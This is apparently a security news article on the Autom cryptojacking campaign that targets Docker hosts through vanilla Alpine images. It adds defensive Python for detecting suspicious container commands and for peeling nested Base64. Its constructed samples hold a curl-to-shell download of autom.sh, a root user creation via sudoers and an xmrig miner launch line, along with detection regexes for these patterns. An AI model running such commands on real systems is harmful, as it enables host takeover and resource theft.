According to new data presented today, an ongoing crypto mining campaign has updated its toolset while improving its defence evasion techniques, allowing the threat actors to mask intrusions and fly under the radar.
According to researchers from DevSecOps and cloud security firm Aqua Security, who have been tracking the malware operation for the past three years, 84 attacks against its honeypot servers have been recorded to date, four of which occurred in 2021. However, 125 incidents were observed in the wild in the third quarter of 2021 alone, indicating that the attacks are not abating.
In the attacks observed, the adversary ran the vanilla image “alpine:latest” with a malicious command appended; that command downloaded a shell script named “autom.sh.”
“Most businesses trust the official images and allow their use,” the researchers wrote in a report shared with The Hacker News. “Adversaries routinely employ vanilla images together with malicious commands to accomplish their attacks. The malicious command that was added to the official image to carry out the attack hasn’t changed much over the years. The server from which the shell script autom.sh was downloaded is the main difference.”
The shell script starts the attack by creating a new user account called “akay” and elevating its privileges to root, which lets the adversary run arbitrary commands on the compromised machine in order to mine cryptocurrency.
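The chain described above (an official base image, a command that fetches and pipes a remote script into a shell, a new user pushed to root) is easy to spot in container metadata if you look for it. The following is an added detection example written for this article, not code from Aqua Security or from the campaign; the container records, the image names and the 203.0.113.10 address are constructed in the shape of `docker inspect` output, and the pattern list is an assumption about what a reasonable first-pass rule would cover.

```python
import json
import re

# Constructed sample in the shape of `docker inspect` output, trimmed to the
# fields used here. Not a real capture; the IP is a documentation address.
SAMPLE_INSPECT = json.dumps([
    {
        "Id": "c0ffee01",
        "Config": {
            "Image": "alpine:latest",
            "Cmd": ["sh", "-c", "apk add curl && curl -s http://203.0.113.10/autom.sh | sh"],
        },
    },
    {
        "Id": "c0ffee02",
        "Config": {
            "Image": "alpine:latest",
            "Cmd": ["sh", "-c", "useradd akay && echo 'akay ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers"],
        },
    },
    {
        "Id": "c0ffee03",
        "Config": {"Image": "nginx:1.21", "Cmd": ["nginx", "-g", "daemon off;"]},
    },
])

# Official (library) images that are normally run without a custom command.
# Assumed list for the example; extend it for your own registry policy.
OFFICIAL_IMAGES = {"alpine", "ubuntu", "debian", "busybox", "centos"}

# Indicators of the stages described in the article. Assumed regexes.
PATTERNS = [
    ("download-and-execute", re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sh|bash|ash)\b")),
    ("new-user", re.compile(r"\b(useradd|adduser)\b")),
    ("sudoers-edit", re.compile(r"/etc/sudoers")),
    ("setuid-bit", re.compile(r"\bchmod\s+[ug]\+s\b")),
]


def is_vanilla_image(image):
    """True for a bare library image such as alpine:latest (no namespace)."""
    name = image.split(":")[0]
    return "/" not in name and name in OFFICIAL_IMAGES


def flag_container(container):
    """Return the indicators found in one container's configured command."""
    cfg = container.get("Config", {})
    cmd = " ".join(cfg.get("Cmd") or [])
    hits = [label for label, rx in PATTERNS if rx.search(cmd)]
    return {
        "id": container["Id"],
        "image": cfg.get("Image"),
        "vanilla": is_vanilla_image(cfg.get("Image", "")),
        "indicators": hits,
    }


def triage(inspect_json):
    """Keep only containers whose command matched at least one indicator."""
    containers = json.loads(inspect_json)
    return [f for f in (flag_container(c) for c in containers) if f["indicators"]]


if __name__ == "__main__":
    for finding in triage(SAMPLE_INSPECT):
        print(finding)
```

Run it against `docker inspect $(docker ps -aq)` on a host you manage; a vanilla image with a download-and-execute or new-user indicator is the combination the report describes, and is worth an alert regardless of which server the script came from.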
Although the mining activity was not hidden in the early stages of the campaign in 2019, later versions show the lengths its developers went to in order to keep it hidden from detection and inspection, most notably the ability to disable security mechanisms and retrieve an obfuscated mining shell script that was Base64-encoded five times to evade security tools.
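Stacked Base64 defeats a scanner that decodes once and gives up; an analyst's tool should keep peeling until the output stops looking like Base64. The function below is an added example for this article (not Aqua Security's tooling and not the campaign's script): it decodes layer after layer, stops at the first layer that is not valid Base64, and reports how many layers it removed. The miner launcher it unwraps is a constructed stand-in, and the 16-layer ceiling is an arbitrary guard against decode loops.

```python
import base64
import binascii
import re

# Only the Base64 alphabet, padding and whitespace (line-wrapped payloads).
B64_ALPHABET = re.compile(rb"^[A-Za-z0-9+/=\s]+$")


def looks_like_base64(data):
    """Cheap structural check before attempting a decode."""
    stripped = b"".join(data.split())
    return (
        len(stripped) >= 8
        and B64_ALPHABET.match(data) is not None
        and len(stripped) % 4 == 0
    )


def peel_base64(blob, max_layers=16):
    """Decode nested Base64 layers; return (innermost bytes, layers removed)."""
    current = blob
    layers = 0
    while layers < max_layers and looks_like_base64(current):
        try:
            # validate=True rejects stray characters instead of skipping them.
            decoded = base64.b64decode(b"".join(current.split()), validate=True)
        except (binascii.Error, ValueError):
            break
        if not decoded:
            break
        current = decoded
        layers += 1
    return current, layers


def wrap_base64(payload, times):
    """Helper used only to build the sample: encode `times` layers deep."""
    for _ in range(times):
        payload = base64.b64encode(payload)
    return payload


# Constructed stand-in for a miner launcher; not the campaign's actual script.
SAMPLE_SCRIPT = b"#!/bin/sh\nnohup ./xmrig -o pool.example:3333 >/dev/null 2>&1 &\n"
SAMPLE_BLOB = wrap_base64(SAMPLE_SCRIPT, 5)

if __name__ == "__main__":
    script, depth = peel_base64(SAMPLE_BLOB)
    print(f"removed {depth} layers")
    print(script.decode())
```

The stop condition matters: the first decoded layer that contains a character outside the Base64 alphabet (here the `#` of the shebang) is the real payload, so the function never tries to decode the script itself and corrupt it.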
Multiple threat actors have been behind malware campaigns aimed at hijacking computers to mine cryptocurrency, such as Kinsing, which has been observed scanning the internet for misconfigured Docker servers in order to break into unprotected hosts and install a previously undocumented coin miner strain.
Furthermore, a hacking group known as TeamTNT has been seen targeting unsecured Redis database servers, Alibaba Elastic Compute Service (ECS) instances, exposed Docker APIs, and vulnerable Kubernetes clusters in order to execute malicious code with root privileges and deploy cryptocurrency-mining payloads and credential stealers. Additionally, malicious images hosted on compromised Docker Hub accounts have been used to distribute cryptocurrency miners.
“Miners are a low-risk way for cybercriminals to turn a vulnerability into digital cash,” Sophos senior threat researcher Sean Gallagher wrote in an analysis of a Tor2Mine mining campaign, which uses a PowerShell script to disable malware protection, execute a miner payload, and harvest Windows credentials.
Security holes in the Log4j logging library, as well as newly disclosed vulnerabilities in Atlassian Confluence, F5 BIG-IP, VMware vCenter, and Oracle WebLogic Server, have been exploited in recent weeks to take control of systems and mine cryptocurrency, a practice known as cryptojacking. QNAP, a manufacturer of network-attached storage (NAS) appliances, issued a warning earlier this month about bitcoin mining malware that can consume up to half of a device’s CPU.
“The Autom campaign demonstrates that attackers are growing smarter, improving their strategies and abilities to elude detection by security systems,” the researchers stated. To defend against these attacks, monitor for suspicious container activity, run dynamic image analysis, and check the environment regularly for misconfigurations, above all a Docker API reachable over the network without authentication.